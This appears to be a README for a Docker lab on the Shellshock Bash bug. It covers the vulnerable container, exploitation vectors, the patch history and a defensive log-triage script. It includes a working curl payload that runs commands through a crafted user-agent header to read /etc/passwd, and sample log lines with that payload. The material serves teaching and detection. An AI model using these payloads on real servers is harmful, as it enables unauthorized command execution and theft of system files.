
Shellshock exploit + vulnerable environment


Shellshock, also known as Bashdoor, is a family of security bugs in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system.

Run a vulnerable environment

You will need Docker installed to run the environment; go to docker.com and install it if you don't have it yet.

To start the vulnerable environment, just run:

docker run --rm -it -p 8080:80 vulnerables/cve-2014-6271

Open your browser and go to localhost:8080; if everything is OK you will see the environment's landing page.

Exploit

There are several ways to exploit this flaw.

Exploit it with a one-liner

A simple example that reads /etc/passwd through the CGI handler:

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" \
http://localhost:8080/cgi-bin/vulnerable

The same header can carry any command you want to run.

Exploit for defacement

exploit-deface.sh is a sample script; run it against the image:

./exploit-deface.sh <ip> <port>

For example, if you are running the container with the command provided above:

./exploit-deface.sh localhost 8080

Just refresh your browser and you will see the defaced page.

Test your system

Run this snippet on your system and the output will tell you whether your Bash is vulnerable or not:

env 'VAR=() { :;}; echo Bash is vulnerable!' 'FUNCTION()=() { :;}; echo Bash is vulnerable!' bash -c "echo Bash Test"

Exploitation Vectors

CGI-based web server

When a web server uses the Common Gateway Interface (CGI) to handle a document request, it passes various details of the request to a handler program through environment variables. For example, the variable HTTP_USER_AGENT normally holds a value identifying the program sending the request. If the request handler is a Bash script, or if it executes one (for example through the system(3) call), Bash receives the environment variables set by the server and parses them; in a vulnerable version, a value that begins with a function definition is executed past the end of the function body, including whatever commands follow it. This gives an attacker a way to trigger the Shellshock vulnerability with a specially crafted request. Security documentation for the widely used Apache web server states that "CGI scripts can ... be extremely dangerous if they are not carefully checked", and other methods of handling web server requests are often used instead. A number of online services attempt to test web servers exposed to the Internet for the vulnerability.
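The following is an added shell example (not code from the opsxcq repository) that serves both the "Test your system" snippet above and the CGI vector: a local probe using the same environment-variable trick, plus two filters that triage combined-format web server logs for the `() {` function-definition prefix. The log lines are constructed for the example, and the function names `bash_is_vulnerable`, `count_shellshock_hits` and `shellshock_source_ips` are chosen here.

```shell
#!/bin/sh
# Added example, not part of the opsxcq repository.
# Defender-side checks for CVE-2014-6271 style input.

# 1. Local probe: export a variable whose value starts with "() {" and see
#    whether the command after the function body runs. Exit status 0 means
#    the given bash is vulnerable, 1 means it ignored the trailing command
#    (or bash is not installed). Same trick as the README's test line.
bash_is_vulnerable() {
    bash_bin="${1:-bash}"
    out=$(env 'X=() { :;}; echo SHELLSHOCK_MARKER' "$bash_bin" -c 'true' 2>/dev/null || true)
    case "$out" in
        *SHELLSHOCK_MARKER*) return 0 ;;
        *)                   return 1 ;;
    esac
}

# 2. Log triage: count combined-format log lines on stdin that carry the
#    function-definition prefix in any field (referer and user-agent are the
#    usual carriers via HTTP_REFERER / HTTP_USER_AGENT). Only the two common
#    spellings are matched; whitespace normalisation is out of scope here.
count_shellshock_hits() {
    grep -cF -e '() {' -e '(){' || true
}

# 3. Same filter, but report the distinct client addresses (first field).
shellshock_source_ips() {
    awk 'index($0, "() {") || index($0, "(){") { print $1 }' | sort -u
}

# Constructed sample log lines (not from a real server): one benign request,
# then two carrying the prefix in the user-agent and referer respectively.
sample_log() {
    cat <<'EOF'
10.0.0.5 - - [25/Sep/2014:10:00:01 +0000] "GET /cgi-bin/vulnerable HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [25/Sep/2014:10:00:02 +0000] "GET /cgi-bin/vulnerable HTTP/1.1" 200 512 "-" "() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'"
10.0.0.9 - - [25/Sep/2014:10:00:03 +0000] "GET /index.html HTTP/1.1" 200 1024 "() { :;}; /bin/sleep 5" "curl/7.30.0"
EOF
}

# Stand-alone run: report on the sample log and on the local bash.
echo "suspicious lines: $(sample_log | count_shellshock_hits)"
echo "sources: $(sample_log | shellshock_source_ips | tr '\n' ' ')"
if bash_is_vulnerable; then echo "local bash: VULNERABLE"; else echo "local bash: not vulnerable"; fi
```

Point `sample_log` at a real access log (`cat /var/log/apache2/access.log | shellshock_source_ips`) to get the list of clients that sent the prefix; a patched Bash still logs the attempt even though the command never runs.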

OpenSSH server

OpenSSH has a "ForceCommand" feature, where a fixed command is executed when the user logs in instead of an unrestricted command shell. The fixed command is executed even if the user asked for a different command; in that case the requested command is placed in the environment variable "SSH_ORIGINAL_COMMAND". When the forced command is run by Bash (because the user's login shell is Bash), a vulnerable Bash parses the SSH_ORIGINAL_COMMAND variable on start-up and runs the commands embedded in it. A user who was granted only restricted shell access can thus use the Shellshock bug to obtain an unrestricted shell.

DHCP clients

Some DHCP clients can also pass commands to Bash; a vulnerable system could be attacked when connecting to an open Wi-Fi network. A DHCP client typically requests and gets an IP address from a DHCP server, but it can also be provided a series of additional options. A malicious DHCP server could provide, in one of these options, a string crafted to execute code on a vulnerable workstation or laptop.

Qmail server

When using Bash to process email messages (e.g. through .forward or qmail-alias piping), the qmail mail server passes external input through in a way that can exploit a vulnerable version of Bash.

IBM HMC restricted shell

The bug can be exploited to gain access to Bash from the restricted shell of the IBM Hardware Management Console, a tiny Linux variant for system administrators. IBM released a patch to resolve this.

Fix

Until 24 September 2014, Bash maintainer Chet Ramey provided a patch version bash43-025 of Bash 4.3 addressing CVE-2014-6271, which was already packaged by distribution maintainers. On 24 September, bash43-026 followed, addressing CVE-2014-7169. Then CVE-2014-7186 was discovered. Florian Weimer from Red Hat posted some patch code for this "unofficially" on 25 September, which Ramey incorporated into Bash as bash43-027. These patches provided code only, helpful only for those who know how to compile ("rebuild") a new Bash binary executable file from the patch file and remaining source code files.

The next day, Red Hat officially presented corresponding updates for Red Hat Enterprise Linux, and a day later for Fedora 21. Canonical Ltd. presented updates for its Ubuntu Long Term Support versions on Saturday, 27 September; on Sunday, there were updates for SUSE Linux Enterprise. The following Monday and Tuesday, at the end of the month, Apple OS X updates appeared.

On 1 October 2014, Michał Zalewski from Google Inc. finally stated that Weimer's code and bash43-027 had fixed not only the first three bugs but even the remaining three that were published after bash43-027, including his own two discoveries. This means that after the earlier distribution updates, no other updates have been required to cover all six issues.

Disclaimer

This program is for educational purposes ONLY. Do not use it without permission. The usual disclaimer applies, especially the fact that I (opsxcq) am not liable for any damages caused by direct or indirect use of the information or functionality provided by these programs. The author or any Internet provider bears NO responsibility for content or misuse of these programs or any derivatives thereof. By using these programs you accept the fact that any damage (data loss, system crash, system compromise, etc.) caused by the use of these programs is not opsxcq's responsibility.
